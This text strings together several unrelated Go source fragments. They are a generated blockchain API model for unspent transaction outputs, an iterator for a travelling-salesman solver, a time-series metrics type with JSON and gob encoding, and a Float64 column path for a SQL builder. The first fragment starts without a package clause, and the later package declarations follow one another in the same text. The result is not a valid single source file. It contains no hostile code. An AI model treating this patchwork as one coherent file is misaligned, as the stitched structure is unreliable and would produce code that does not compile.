// Every field is required (NewListUnspentTransactionOutputsByAddressRI takes them all).
type ListUnspentTransactionOutputsByAddressRI struct {
	// Represents the index position of the transaction in the block.
	Index int32 `json:"index"`
	// Represents the time at which a particular transaction can be added to the blockchain
	Locktime int32 `json:"locktime"`
	// Represents the hash of the block where this transaction was mined/confirmed for first time. The hash is defined as a cryptographic digital fingerprint made by hashing the block header twice through the SHA256 algorithm.
	MinedInBlockHash string `json:"minedInBlockHash"`
	// Represents the hight of the block where this transaction was mined/confirmed for first time. The height is defined as the number of blocks in the blockchain preceding this specific block.
	MinedInBlockHeight int32 `json:"minedInBlockHeight"`
	// Represents a list of recipient addresses with the respective amounts. In account-based protocols like Ethereum there is only one address in this list.
	Recipients []GetTransactionDetailsByTransactionIDRIRecipients `json:"recipients"`
	// Object Array representation of transaction senders
	Senders []ListUnspentTransactionOutputsByAddressRISenders `json:"senders"`
	// Represents the total size of this transaction
	Size int32 `json:"size"`
	// Defines the exact date/time in Unix Timestamp when this transaction was mined, confirmed or first seen in Mempool, if it is unconfirmed.
	Timestamp int32 `json:"timestamp"`
	// Represents the same as `transactionId` for account-based protocols like Ethereum, while it could be different in UTXO-based protocols like Bitcoin. E.g., in UTXO-based protocols `hash` is different from `transactionId` for SegWit transactions.
	TransactionHash string `json:"transactionHash"`
	// Represents the unique identifier of a transaction, i.e. it could be `transactionId` in UTXO-based protocols like Bitcoin, and transaction `hash` in Ethereum blockchain.
	TransactionId string `json:"transactionId"`
	// Represents the transaction version number.
	Version int32 `json:"version"`
	// Represents the transaction inputs.
	Vin []ListUnspentTransactionOutputsByAddressRIVin `json:"vin"`
	// Represents the transaction outputs.
	Vout []ListConfirmedTransactionsByAddressRIBSBVout `json:"vout"`
	Fee ListUnspentTransactionOutputsByAddressRIFee `json:"fee"`
	BlockchainSpecific ListUnspentTransactionOutputsByAddressRIBlockchainSpecific `json:"blockchainSpecific"`
}
// NewListUnspentTransactionOutputsByAddressRI instantiates a new ListUnspentTransactionOutputsByAddressRI object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewListUnspentTransactionOutputsByAddressRI(index int32, locktime int32, minedInBlockHash string, minedInBlockHeight int32, recipients []GetTransactionDetailsByTransactionIDRIRecipients, senders []ListUnspentTransactionOutputsByAddressRISenders, size int32, timestamp int32, transactionHash string, transactionId string, version int32, vin []ListUnspentTransactionOutputsByAddressRIVin, vout []ListConfirmedTransactionsByAddressRIBSBVout, fee ListUnspentTransactionOutputsByAddressRIFee, blockchainSpecific ListUnspentTransactionOutputsByAddressRIBlockchainSpecific) *ListUnspentTransactionOutputsByAddressRI {
	return &ListUnspentTransactionOutputsByAddressRI{
		Index:              index,
		Locktime:           locktime,
		MinedInBlockHash:   minedInBlockHash,
		MinedInBlockHeight: minedInBlockHeight,
		Recipients:         recipients,
		Senders:            senders,
		Size:               size,
		Timestamp:          timestamp,
		TransactionHash:    transactionHash,
		TransactionId:      transactionId,
		Version:            version,
		Vin:                vin,
		Vout:               vout,
		Fee:                fee,
		BlockchainSpecific: blockchainSpecific,
	}
}
// NewListUnspentTransactionOutputsByAddressRIWithDefaults instantiates a new ListUnspentTransactionOutputsByAddressRI object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
// (no field of this model has a default, so the result is all zero values).
func NewListUnspentTransactionOutputsByAddressRIWithDefaults() *ListUnspentTransactionOutputsByAddressRI {
	this := ListUnspentTransactionOutputsByAddressRI{}
	return &this
}
// GetIndex returns the Index field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetIndex() int32 {
	if o == nil {
		var ret int32
		return ret
	}
	return o.Index
}

// GetIndexOk returns a tuple with the Index field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetIndexOk() (*int32, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Index, true
}

// SetIndex sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetIndex(v int32) {
	o.Index = v
}

// GetLocktime returns the Locktime field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetLocktime() int32 {
	if o == nil {
		var ret int32
		return ret
	}
	return o.Locktime
}

// GetLocktimeOk returns a tuple with the Locktime field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetLocktimeOk() (*int32, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Locktime, true
}

// SetLocktime sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetLocktime(v int32) {
	o.Locktime = v
}

// GetMinedInBlockHash returns the MinedInBlockHash field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHash() string {
	if o == nil {
		var ret string
		return ret
	}
	return o.MinedInBlockHash
}

// GetMinedInBlockHashOk returns a tuple with the MinedInBlockHash field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHashOk() (*string, bool) {
	if o == nil {
		return nil, false
	}
	return &o.MinedInBlockHash, true
}

// SetMinedInBlockHash sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetMinedInBlockHash(v string) {
	o.MinedInBlockHash = v
}

// GetMinedInBlockHeight returns the MinedInBlockHeight field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHeight() int32 {
	if o == nil {
		var ret int32
		return ret
	}
	return o.MinedInBlockHeight
}

// GetMinedInBlockHeightOk returns a tuple with the MinedInBlockHeight field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHeightOk() (*int32, bool) {
	if o == nil {
		return nil, false
	}
	return &o.MinedInBlockHeight, true
}

// SetMinedInBlockHeight sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetMinedInBlockHeight(v int32) {
	o.MinedInBlockHeight = v
}

// GetRecipients returns the Recipients field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetRecipients() []GetTransactionDetailsByTransactionIDRIRecipients {
	if o == nil {
		var ret []GetTransactionDetailsByTransactionIDRIRecipients
		return ret
	}
	return o.Recipients
}

// GetRecipientsOk returns a tuple with the Recipients field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetRecipientsOk() (*[]GetTransactionDetailsByTransactionIDRIRecipients, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Recipients, true
}

// SetRecipients sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetRecipients(v []GetTransactionDetailsByTransactionIDRIRecipients) {
	o.Recipients = v
}
// GetSenders returns the Senders field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetSenders() []ListUnspentTransactionOutputsByAddressRISenders {
	if o == nil {
		var ret []ListUnspentTransactionOutputsByAddressRISenders
		return ret
	}
	return o.Senders
}

// GetSendersOk returns a tuple with the Senders field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetSendersOk() (*[]ListUnspentTransactionOutputsByAddressRISenders, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Senders, true
}

// SetSenders sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetSenders(v []ListUnspentTransactionOutputsByAddressRISenders) {
	o.Senders = v
}

// GetSize returns the Size field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetSize() int32 {
	if o == nil {
		var ret int32
		return ret
	}
	return o.Size
}

// GetSizeOk returns a tuple with the Size field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetSizeOk() (*int32, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Size, true
}

// SetSize sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetSize(v int32) {
	o.Size = v
}

// GetTimestamp returns the Timestamp field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTimestamp() int32 {
	if o == nil {
		var ret int32
		return ret
	}
	return o.Timestamp
}

// GetTimestampOk returns a tuple with the Timestamp field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTimestampOk() (*int32, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Timestamp, true
}

// SetTimestamp sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetTimestamp(v int32) {
	o.Timestamp = v
}

// GetTransactionHash returns the TransactionHash field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionHash() string {
	if o == nil {
		var ret string
		return ret
	}
	return o.TransactionHash
}

// GetTransactionHashOk returns a tuple with the TransactionHash field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionHashOk() (*string, bool) {
	if o == nil {
		return nil, false
	}
	return &o.TransactionHash, true
}

// SetTransactionHash sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetTransactionHash(v string) {
	o.TransactionHash = v
}

// GetTransactionId returns the TransactionId field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionId() string {
	if o == nil {
		var ret string
		return ret
	}
	return o.TransactionId
}

// GetTransactionIdOk returns a tuple with the TransactionId field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionIdOk() (*string, bool) {
	if o == nil {
		return nil, false
	}
	return &o.TransactionId, true
}

// SetTransactionId sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetTransactionId(v string) {
	o.TransactionId = v
}
// GetVersion returns the Version field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVersion() int32 {
	if o == nil {
		var ret int32
		return ret
	}
	return o.Version
}

// GetVersionOk returns a tuple with the Version field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVersionOk() (*int32, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Version, true
}

// SetVersion sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetVersion(v int32) {
	o.Version = v
}

// GetVin returns the Vin field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVin() []ListUnspentTransactionOutputsByAddressRIVin {
	if o == nil {
		var ret []ListUnspentTransactionOutputsByAddressRIVin
		return ret
	}
	return o.Vin
}

// GetVinOk returns a tuple with the Vin field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVinOk() (*[]ListUnspentTransactionOutputsByAddressRIVin, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Vin, true
}

// SetVin sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetVin(v []ListUnspentTransactionOutputsByAddressRIVin) {
	o.Vin = v
}

// GetVout returns the Vout field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVout() []ListConfirmedTransactionsByAddressRIBSBVout {
	if o == nil {
		var ret []ListConfirmedTransactionsByAddressRIBSBVout
		return ret
	}
	return o.Vout
}

// GetVoutOk returns a tuple with the Vout field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVoutOk() (*[]ListConfirmedTransactionsByAddressRIBSBVout, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Vout, true
}

// SetVout sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetVout(v []ListConfirmedTransactionsByAddressRIBSBVout) {
	o.Vout = v
}

// GetFee returns the Fee field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetFee() ListUnspentTransactionOutputsByAddressRIFee {
	if o == nil {
		var ret ListUnspentTransactionOutputsByAddressRIFee
		return ret
	}
	return o.Fee
}

// GetFeeOk returns a tuple with the Fee field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetFeeOk() (*ListUnspentTransactionOutputsByAddressRIFee, bool) {
	if o == nil {
		return nil, false
	}
	return &o.Fee, true
}

// SetFee sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetFee(v ListUnspentTransactionOutputsByAddressRIFee) {
	o.Fee = v
}

// GetBlockchainSpecific returns the BlockchainSpecific field value.
func (o *ListUnspentTransactionOutputsByAddressRI) GetBlockchainSpecific() ListUnspentTransactionOutputsByAddressRIBlockchainSpecific {
	if o == nil {
		var ret ListUnspentTransactionOutputsByAddressRIBlockchainSpecific
		return ret
	}
	return o.BlockchainSpecific
}

// GetBlockchainSpecificOk returns a tuple with the BlockchainSpecific field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetBlockchainSpecificOk() (*ListUnspentTransactionOutputsByAddressRIBlockchainSpecific, bool) {
	if o == nil {
		return nil, false
	}
	return &o.BlockchainSpecific, true
}

// SetBlockchainSpecific sets field value.
func (o *ListUnspentTransactionOutputsByAddressRI) SetBlockchainSpecific(v ListUnspentTransactionOutputsByAddressRIBlockchainSpecific) {
	o.BlockchainSpecific = v
}
// MarshalJSON implements json.Marshaler.
//
// Every field of this model is required by the API schema, so all of them
// are serialized unconditionally. The generator's fifteen `if true { ... }`
// guards were redundant no-ops; collapsing them into one map literal emits
// byte-for-byte identical JSON.
func (o ListUnspentTransactionOutputsByAddressRI) MarshalJSON() ([]byte, error) {
	toSerialize := map[string]interface{}{
		"index":              o.Index,
		"locktime":           o.Locktime,
		"minedInBlockHash":   o.MinedInBlockHash,
		"minedInBlockHeight": o.MinedInBlockHeight,
		"recipients":         o.Recipients,
		"senders":            o.Senders,
		"size":               o.Size,
		"timestamp":          o.Timestamp,
		"transactionHash":    o.TransactionHash,
		"transactionId":      o.TransactionId,
		"version":            o.Version,
		"vin":                o.Vin,
		"vout":               o.Vout,
		"fee":                o.Fee,
		"blockchainSpecific": o.BlockchainSpecific,
	}
	return json.Marshal(toSerialize)
}
// NullableListUnspentTransactionOutputsByAddressRI is a wrapper that
// distinguishes "explicitly set (possibly to null)" from "not set",
// which plain pointers cannot express in JSON round-trips.
type NullableListUnspentTransactionOutputsByAddressRI struct {
	value *ListUnspentTransactionOutputsByAddressRI
	isSet bool
}
// Get returns the wrapped value; it may be nil.
func (v NullableListUnspentTransactionOutputsByAddressRI) Get() *ListUnspentTransactionOutputsByAddressRI {
	return v.value
}
// Set stores val and marks the wrapper as set, even when val is nil.
func (v *NullableListUnspentTransactionOutputsByAddressRI) Set(val *ListUnspentTransactionOutputsByAddressRI) {
	v.value = val
	v.isSet = true
}
// IsSet reports whether Set or UnmarshalJSON has been called.
func (v NullableListUnspentTransactionOutputsByAddressRI) IsSet() bool {
	return v.isSet
}
// Unset clears both the value and the set flag.
func (v *NullableListUnspentTransactionOutputsByAddressRI) Unset() {
	v.value = nil
	v.isSet = false
}
// NewNullableListUnspentTransactionOutputsByAddressRI wraps val as an
// already-set value.
func NewNullableListUnspentTransactionOutputsByAddressRI(val *ListUnspentTransactionOutputsByAddressRI) *NullableListUnspentTransactionOutputsByAddressRI {
	return &NullableListUnspentTransactionOutputsByAddressRI{value: val, isSet: true}
}
// MarshalJSON encodes the wrapped value; an unset or nil value encodes as null.
func (v NullableListUnspentTransactionOutputsByAddressRI) MarshalJSON() ([]byte, error) {
	return json.Marshal(v.value)
}
// UnmarshalJSON decodes src into the wrapped value and marks the wrapper
// as set, even when src is the JSON literal null.
func (v *NullableListUnspentTransactionOutputsByAddressRI) UnmarshalJSON(src []byte) error {
	v.isSet = true
	return json.Unmarshal(src, &v.value)
}
package iterator
import (
"fmt"
"github.com/Spi1y/tsp-solver/solver2/types"
)
// Iterator is a calculator used to determine the following values:
// - nodes left to visit (based on currently traveled path)
// - rows and columns used to calculate distance lower estimate (based on the path and the next node)
type Iterator struct {
	// Size of the matrix, set in the Init()
	size types.Index
	// Mask slice of visited nodes, used to simplify path processing
	nodesVisited []bool
	// Last known node of the path
	lastNode int16
	// Calculated lists. These buffers are allocated once in Init() and
	// resliced on every call to avoid per-call allocations, so slices
	// returned to callers are only valid until the next SetPath /
	// ColsToIterate call.
	nodesToVisit  []types.Index
	colsToIterate []types.Index
	//rowsToIterate []types.Index
}
// Init is used to initialize internal structures according to the distance
// matrix size. It must be called before SetPath: a zero-size
// (uninitialized) iterator is rejected there.
func (it *Iterator) Init(size types.Index) {
	it.size = size
	// Pre-allocate every buffer at full matrix size; later calls only
	// reslice these, never reallocate.
	it.nodesVisited = make([]bool, size)
	it.nodesToVisit = make([]types.Index, size)
	it.colsToIterate = make([]types.Index, size)
	//it.rowsToIterate = make([]types.Index, size)
}
// SetPath processes the given path and recalculates the internal data
// structures (visited mask, nodes left to visit, last node of the path).
//
// The path must start with node 0, contain only indices < size, and be
// no longer than the matrix size; otherwise an error is returned and
// the iterator state is unspecified.
func (it *Iterator) SetPath(path []types.Index) error {
	if it.size == 0 {
		return fmt.Errorf("Iterator is not initialized")
	}
	if (len(path) == 0) || (path[0] != 0) {
		return fmt.Errorf("Path must include 0 node as the first element")
	}
	if it.size < types.Index(len(path)) {
		return fmt.Errorf("Incorrect path: length %v is greater than matrix size %v", len(path), it.size)
	}
	nodesCount := it.size - types.Index(len(path))
	it.nodesToVisit = it.nodesToVisit[:nodesCount]
	it.resetBuf()
	for _, node := range path {
		if node >= it.size {
			return fmt.Errorf("Wrong node in the path: index %v is greater than matrix size %v", node, it.size)
		}
		it.nodesVisited[node] = true
	}
	// path is guaranteed non-empty by the guard above, so its last element
	// is always valid. (The original `len(path) == 0 -> lastNode = -1`
	// fallback below was dead code.) Setting lastNode before the full-path
	// early return also fixes it being left stale from a previous call.
	it.lastNode = int16(path[len(path)-1])
	if it.size == types.Index(len(path)) {
		// Full path traveled - nothing left to visit.
		return nil
	}
	// Collect every node not marked visited, in ascending order.
	c := 0
	for i := 0; types.Index(i) < it.size; i++ {
		if !it.nodesVisited[i] {
			it.nodesToVisit[c] = types.Index(i)
			c++
		}
	}
	return nil
}
// NodesToVisit retrieves the list of nodes left to visit.
// The returned slice is an internal buffer, overwritten by the next
// SetPath call; callers must not retain it.
func (it *Iterator) NodesToVisit() []types.Index {
	return it.nodesToVisit
}
// ColsToIterate is used to calculate the list of column indices which have to
// be processed to determine distance lower estimate, based on the path and the next node.
// The result is node 0 followed by every unvisited node except `node`
// itself, and reuses an internal buffer valid only until the next call.
func (it *Iterator) ColsToIterate(node types.Index) ([]types.Index, error) {
	if node >= it.size {
		return nil, fmt.Errorf("Incorrect next node index %v", node)
	}
	if len(it.nodesToVisit) == 0 {
		// Full path already traveled: the only legal "next" node is the
		// return to 0, and there are no columns left to iterate.
		if node != 0 {
			return nil, fmt.Errorf("Incorrect next node index %v", node)
		}
		it.colsToIterate = it.colsToIterate[:0]
		return it.colsToIterate, nil
	}
	if it.nodesVisited[node] == true {
		return nil, fmt.Errorf("Node %v already visited", node)
	}
	// Locate node's position inside nodesToVisit so it can be excluded
	// from the copies below.
	var index types.Index
	for i, val := range it.nodesToVisit {
		if val == node {
			index = types.Index(i)
			break
		}
	}
	// We do not decrement len because we need one additional element to hold 0 node
	it.colsToIterate = it.colsToIterate[:len(it.nodesToVisit)]
	it.colsToIterate[0] = 0
	copy(it.colsToIterate[1:index+1], it.nodesToVisit[:index])
	copy(it.colsToIterate[index+1:], it.nodesToVisit[index+1:])
	return it.colsToIterate, nil
}
// RowsToIterate is used to calculate the list of row indices which have to
// be processed to determine distance lower estimate, based on the path and the next node.
// It is equal to it.nodesToVisit (same internal buffer; do not retain).
func (it *Iterator) RowsToIterate() []types.Index {
	return it.nodesToVisit
}
// resetBuf resets values in the buffer to false using copy optimization:
// after clearing element 0, each pass copies the already-cleared prefix
// over the next region while the cleared region doubles in size, zeroing
// the whole slice in O(log n) copy calls instead of a per-element loop.
func (it *Iterator) resetBuf() {
	if len(it.nodesVisited) == 0 {
		return
	}
	it.nodesVisited[0] = false
	for j := 1; types.Index(j) < it.size; j *= 2 {
		copy(it.nodesVisited[j:], it.nodesVisited[:j])
	}
}
package report
import (
"bytes"
"encoding/gob"
"encoding/json"
"math"
"time"
"github.com/mndrix/ps"
)
// Metrics is a string->metric map.
type Metrics map[string]Metric
// Merge merges two sets maps into a fresh set, performing set-union merges as
// appropriate. Neither receiver nor argument is mutated.
func (m Metrics) Merge(other Metrics) Metrics {
	merged := m.Copy()
	for key, metric := range other {
		merged[key] = merged[key].Merge(metric)
	}
	return merged
}
// Copy returns a value copy of the sets map.
func (m Metrics) Copy() Metrics {
	out := make(Metrics, len(m))
	for key, metric := range m {
		out[key] = metric
	}
	return out
}
// Metric is a list of timeseries data with some metadata. Clients must use the
// Add method to add values. Metrics are immutable.
//
// Samples are stored newest-first internally; the wire representation
// (WireMetrics) uses the opposite, oldest-first order.
type Metric struct {
	Samples ps.List
	Min, Max float64
	First, Last time.Time
}
// Sample is a single datapoint of a metric.
type Sample struct {
	Timestamp time.Time `json:"date"`
	Value float64 `json:"value"`
}
// nilMetric is the shared empty metric handed out by MakeMetric.
var nilMetric = Metric{Samples: ps.NewList()}
// MakeMetric makes a new Metric.
//
// NOTE(review): Min and Max start at the zero value 0, and Add only ever
// takes math.Min/math.Max against them - so an all-positive series still
// reports Min == 0 (and all-negative Max == 0). Presumably intended for
// these gauges; confirm with consumers.
func MakeMetric() Metric {
	return nilMetric
}
// Copy returns a value copy of the Metric. Metric is immutable, so the
// receiver copy itself is sufficient.
func (m Metric) Copy() Metric {
	return m
}
// WithFirst returns a fresh copy of m, with First set to t.
func (m Metric) WithFirst(t time.Time) Metric {
	// m is already a copy (value receiver); mutate and return it.
	m.First = t
	return m
}
// WithMax returns a fresh copy of m, with Max set to max.
func (m Metric) WithMax(max float64) Metric {
	m.Max = max
	return m
}
// Len returns the number of samples in the metric.
func (m Metric) Len() int {
	if m.Samples != nil {
		return m.Samples.Size()
	}
	return 0
}
func first(t1, t2 time.Time) time.Time {
if t2.IsZero() || (!t1.IsZero() && t1.Before(t2)) {
return t1
}
return t2
}
func last(t1, t2 time.Time) time.Time {
if t2.IsZero() || (!t1.IsZero() && t1.After(t2)) {
return t1
}
return t2
}
// revCons appends acc to the head of curr, where acc is in reverse order.
// acc must never be nil, curr can be.
func revCons(acc, curr ps.List) ps.List {
	if curr == nil {
		return acc.Reverse()
	}
	// Pop from acc and push onto curr: this re-reverses acc while
	// prepending it, yielding acc's elements in original order followed
	// by curr.
	for !acc.IsNil() {
		acc, curr = acc.Tail(), curr.Cons(acc.Head())
	}
	return curr
}
// Add returns a new Metric with (t, v) added to its Samples. Add is the only
// valid way to grow a Metric.
func (m Metric) Add(t time.Time, v float64) Metric {
	// Find the first element which is before your element, and insert
	// your new element in the list. NB we want to dedupe entries with
	// equal timestamps.
	// This should be O(1) to insert a latest element, and O(n) in general.
	curr, acc := m.Samples, ps.NewList()
	for {
		if curr == nil || curr.IsNil() {
			// Reached the end: t is older than every existing sample.
			acc = acc.Cons(Sample{t, v})
			break
		}
		currSample := curr.Head().(Sample)
		if currSample.Timestamp.Equal(t) {
			// Same timestamp: replace the existing sample (dedupe).
			acc, curr = acc.Cons(Sample{t, v}), curr.Tail()
			break
		}
		if currSample.Timestamp.Before(t) {
			// Samples are newest-first, so insert just before the first
			// sample older than t.
			acc = acc.Cons(Sample{t, v})
			break
		}
		acc, curr = acc.Cons(curr.Head()), curr.Tail()
	}
	acc = revCons(acc, curr)
	return Metric{
		Samples: acc,
		Max: math.Max(m.Max, v),
		Min: math.Min(m.Min, v),
		First: first(m.First, t),
		Last: last(m.Last, t),
	}
}
// Merge combines the two Metrics and returns a new result.
func (m Metric) Merge(other Metric) Metric {
	// Merge two lists of samples in O(n) - both lists are newest-first,
	// so this is a standard sorted-merge.
	curr1, curr2, acc := m.Samples, other.Samples, ps.NewList()
	for {
		if curr1 == nil || curr1.IsNil() {
			acc = revCons(acc, curr2)
			break
		} else if curr2 == nil || curr2.IsNil() {
			acc = revCons(acc, curr1)
			break
		}
		s1 := curr1.Head().(Sample)
		s2 := curr2.Head().(Sample)
		if s1.Timestamp.Equal(s2.Timestamp) {
			// Equal timestamps: keep the receiver's sample, drop other's.
			curr1, curr2, acc = curr1.Tail(), curr2.Tail(), acc.Cons(s1)
		} else if s1.Timestamp.After(s2.Timestamp) {
			curr1, acc = curr1.Tail(), acc.Cons(s1)
		} else {
			curr2, acc = curr2.Tail(), acc.Cons(s2)
		}
	}
	return Metric{
		Samples: acc,
		Max: math.Max(m.Max, other.Max),
		Min: math.Min(m.Min, other.Min),
		First: first(m.First, other.First),
		Last: last(m.Last, other.Last),
	}
}
// Div returns a new copy of the metric, with each value divided by n.
// Min and Max are scaled too; First/Last are copied unchanged.
func (m Metric) Div(n float64) Metric {
	curr, acc := m.Samples, ps.NewList()
	for curr != nil && !curr.IsNil() {
		s := curr.Head().(Sample)
		curr, acc = curr.Tail(), acc.Cons(Sample{s.Timestamp, s.Value / n})
	}
	// Cons built the list back-to-front; restore newest-first order.
	acc = acc.Reverse()
	return Metric{
		Samples: acc,
		Max: m.Max / n,
		Min: m.Min / n,
		First: m.First,
		Last: m.Last,
	}
}
// LastSample returns the last sample in the metric, or nil if there are no
// samples. Samples are newest-first, so the head is the most recent one.
// The returned pointer is to a local copy; mutating it does not affect m.
func (m Metric) LastSample() *Sample {
	if m.Samples == nil || m.Samples.IsNil() {
		return nil
	}
	s := m.Samples.Head().(Sample)
	return &s
}
// WireMetrics is the on-the-wire representation of Metrics.
// First/Last are RFC3339Nano strings; the empty string means "unset"
// (see renderTime/parseTime).
type WireMetrics struct {
	Samples []Sample `json:"samples"` // On the wire, samples are sorted oldest to newest,
	Min float64 `json:"min"` // the opposite order to how we store them internally.
	Max float64 `json:"max"`
	First string `json:"first,omitempty"`
	Last string `json:"last,omitempty"`
}
func renderTime(t time.Time) string {
if t.IsZero() {
return ""
}
return t.Format(time.RFC3339Nano)
}
func parseTime(s string) time.Time {
t, _ := time.Parse(time.RFC3339Nano, s)
return t
}
// toIntermediate converts the Metric to its wire form, reversing the
// samples from newest-first (internal) to oldest-first (wire).
func (m Metric) toIntermediate() WireMetrics {
	// Non-nil empty slice so JSON emits [] rather than null.
	samples := []Sample{}
	if m.Samples != nil {
		m.Samples.Reverse().ForEach(func(s interface{}) {
			samples = append(samples, s.(Sample))
		})
	}
	return WireMetrics{
		Samples: samples,
		Max: m.Max,
		Min: m.Min,
		First: renderTime(m.First),
		Last: renderTime(m.Last),
	}
}
// fromIntermediate converts the wire form back to a Metric. Cons-ing the
// oldest-first wire samples one by one naturally rebuilds the
// newest-first internal order.
func (m WireMetrics) fromIntermediate() Metric {
	samples := ps.NewList()
	for _, s := range m.Samples {
		samples = samples.Cons(s)
	}
	return Metric{
		Samples: samples,
		Max: m.Max,
		Min: m.Min,
		First: parseTime(m.First),
		Last: parseTime(m.Last),
	}
}
// MarshalJSON implements json.Marshaler, encoding the wire form of the
// metric. Marshaling directly (instead of the previous Encoder-into-buffer
// dance) avoids an intermediate buffer and the trailing newline that
// Encoder.Encode appends; the JSON payload itself is unchanged.
func (m Metric) MarshalJSON() ([]byte, error) {
	return json.Marshal(m.toIntermediate())
}
// UnmarshalJSON implements json.Unmarshaler.
// Note: the streaming Decoder stops after the first JSON value, so any
// trailing bytes in input are silently ignored (json.Unmarshal would
// reject them) - kept as-is to preserve behavior.
func (m *Metric) UnmarshalJSON(input []byte) error {
	in := WireMetrics{}
	if err := json.NewDecoder(bytes.NewBuffer(input)).Decode(&in); err != nil {
		return err
	}
	*m = in.fromIntermediate()
	return nil
}
// GobEncode implements gob.GobEncoder, serializing the metric via its
// intermediate wire form.
func (m Metric) GobEncode() ([]byte, error) {
	buf := bytes.Buffer{}
	err := gob.NewEncoder(&buf).Encode(m.toIntermediate())
	return buf.Bytes(), err
}
// GobDecode implements gob.GobDecoder, the inverse of GobEncode.
func (m *Metric) GobDecode(input []byte) error {
	in := WireMetrics{}
	if err := gob.NewDecoder(bytes.NewBuffer(input)).Decode(&in); err != nil {
		return err
	}
	*m = in.fromIntermediate()
	return nil
}
package path
import (
"github.com/weworksandbox/lingo"
"github.com/weworksandbox/lingo/expr"
"github.com/weworksandbox/lingo/expr/operator"
"github.com/weworksandbox/lingo/expr/set"
"github.com/weworksandbox/lingo/sql"
)
// NewFloat64WithAlias creates a Float64 column path for the given table,
// column name, and SQL alias.
func NewFloat64WithAlias(e lingo.Table, name, alias string) Float64 {
	return Float64{
		entity: e,
		name:   name,
		alias:  alias,
	}
}
// NewFloat64 creates a Float64 column path with no alias.
func NewFloat64(e lingo.Table, name string) Float64 {
	return NewFloat64WithAlias(e, name, "")
}
// Float64 is a column path of SQL float64 type, tied to its parent table.
type Float64 struct {
	entity lingo.Table
	name   string
	alias  string
}
// GetParent returns the table this column belongs to.
func (p Float64) GetParent() lingo.Table {
	return p.entity
}
// GetName returns the column name.
func (p Float64) GetName() string {
	return p.name
}
// GetAlias returns the column alias, or "" when unset.
func (p Float64) GetAlias() string {
	return p.alias
}
// As returns a copy of the path with the alias set; the receiver is
// unchanged (value semantics).
func (p Float64) As(alias string) Float64 {
	p.alias = alias
	return p
}
// ToSQL renders this column reference as SQL for the given dialect.
func (p Float64) ToSQL(d lingo.Dialect) (sql.Data, error) {
	return ExpandColumnWithDialect(d, p)
}
// To builds a SET assignment of this column to the literal value.
func (p Float64) To(value float64) set.Set {
	return set.To(p, expr.NewValue(value))
}
// ToExpr builds a SET assignment of this column to the given expression.
func (p Float64) ToExpr(exp lingo.Expression) set.Set {
	return set.To(p, exp)
}
// Eq builds an equality comparison of this column against a literal value.
func (p Float64) Eq(value float64) operator.Binary {
	return operator.Eq(p, expr.NewValue(value))
}
// EqPath builds an equality comparison of this column against an expression.
func (p Float64) EqPath(exp lingo.Expression) operator.Binary {
	return operator.Eq(p, exp)
}
// NotEq builds an inequality comparison against a literal value.
func (p Float64) NotEq(value float64) operator.Binary {
	return operator.NotEq(p, expr.NewValue(value))
}
// NotEqPath builds an inequality comparison against an expression.
func (p Float64) NotEqPath(exp lingo.Expression) operator.Binary {
	return operator.NotEq(p, exp)
}
